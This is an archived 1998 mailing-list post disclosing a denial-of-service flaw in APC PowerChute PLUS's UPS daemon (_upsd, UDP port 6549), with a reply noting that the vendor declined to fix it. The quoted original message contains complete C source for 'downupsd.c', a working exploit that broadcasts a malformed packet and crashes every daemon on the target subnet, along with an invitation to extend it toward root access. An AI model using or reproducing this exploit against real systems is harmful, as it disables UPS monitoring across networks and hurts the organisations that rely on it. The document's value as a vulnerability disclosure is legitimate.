You don't need a specific exploit program to crash PowerChute software. Some port-scanners will crash it. We contacted PowerChute several months ago. Here's what the person who contacted them reported. I talked with the unix group at APC (the vendor for the UPS) about the problem of the ups daemon (_upsd) dying when another process such as a port scanner accessing the port thru which it runs. I filed trouble report #792505. They said this result is expected of the ups daemon not only on unix systems but also other operating systems such as NT. No work-around is being resolved by them unless enough customers complained. The only solution for us is to develop a script to monitor ... ..Richard Peters At 11:13 PM -0400 4/10/98, Theo Schlossnagle wrote: >I run Solaris x86 (2.5, 2.5.1, 2.6). I have a APC Smart UPS 700 (Model >shouldn't matter for the exploit). Exploit in PowerChute PLUS v4.2.2 > >The PowerChute PLUS software distributed with the UPSs provides a TCP/IP >(UDP/IP) way to communicate with (for monitoring) UPS on the local subnet. >It listens on port 6549 and listens for broadcast requests (UDP). >So if you make as if you are actually requesting information, but send it >the wrong packet... Well end of ./_upsd (the name of the daemon). >I assume an exploit could be tailored to leverage root privileges. >The REALLY BAD news is that ALL upsd's on the subnet are effected (UDP >broadcast) > >I would wager that this is not only a problem on Solaris x86. If anyone >finds this to work on other platforms I would love to know, also if >someone tailors it to gain root or other interesting things, I would love >to here about it. > >I spoke with APC (www.apcc.com) and they blew me off. Forwarded the issue >to their techinical crew, but I never heard word again. > >Here goes: > >----- begin downupsd.c ----- >#include <stdio.h> >#include <stdlib.h> >#include <unistd.h> >#include <sys/types.h> >#include <sys/socket.h> >#include <netdb.h> >#include <netinet/in.h> > >int main(int argc, char **argv) { >int s; >long on=1; >size_t addrsize; >char buffer[256]; >struct sockaddr_in toaddr, fromaddr; >struct hostent h_ent; > >if(argc!=2) { > fprintf(stderr, "Usage:\n\t%s <hostname running upsd>\n", argv[0]); > exit(0); >} >s = socket(AF_INET,SOCK_DGRAM,0); >setsockopt(s, SOL_SOCKET, SO_BROADCAST, (char *)&on, sizeof(on)); > >printf("Crashing upsd on host's subnet: %s\n", argv[1]); > >toaddr.sin_family = AF_INET; >toaddr.sin_port = htons(0); >toaddr.sin_addr.s_addr = 0x00000000; >bind(s, (struct sockaddr *)&toaddr, sizeof(struct sockaddr_in)); >toaddr.sin_port = htons(6549); >memcpy((char *)&h_ent, (char *)gethostbyname(argv[1]), sizeof(h_ent)); >memcpy(&toaddr.sin_addr.s_addr, h_ent.h_addr, sizeof(struct in_addr)); >toaddr.sin_addr.s_addr |= 0xff000000; >strcpy(buffer, "027|1|public|9|0|0|2010~|0\0"); >sendto(s, buffer, 256, 0, (struct sockaddr *)&toaddr, > sizeof(struct sockaddr_in)); > >printf("Crashed...\n"); >close(s); > >} >------- end downupsd.c ----- > > >Theo Schlossnagle >jesusat_private >That jesus guy
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:49:06 PDT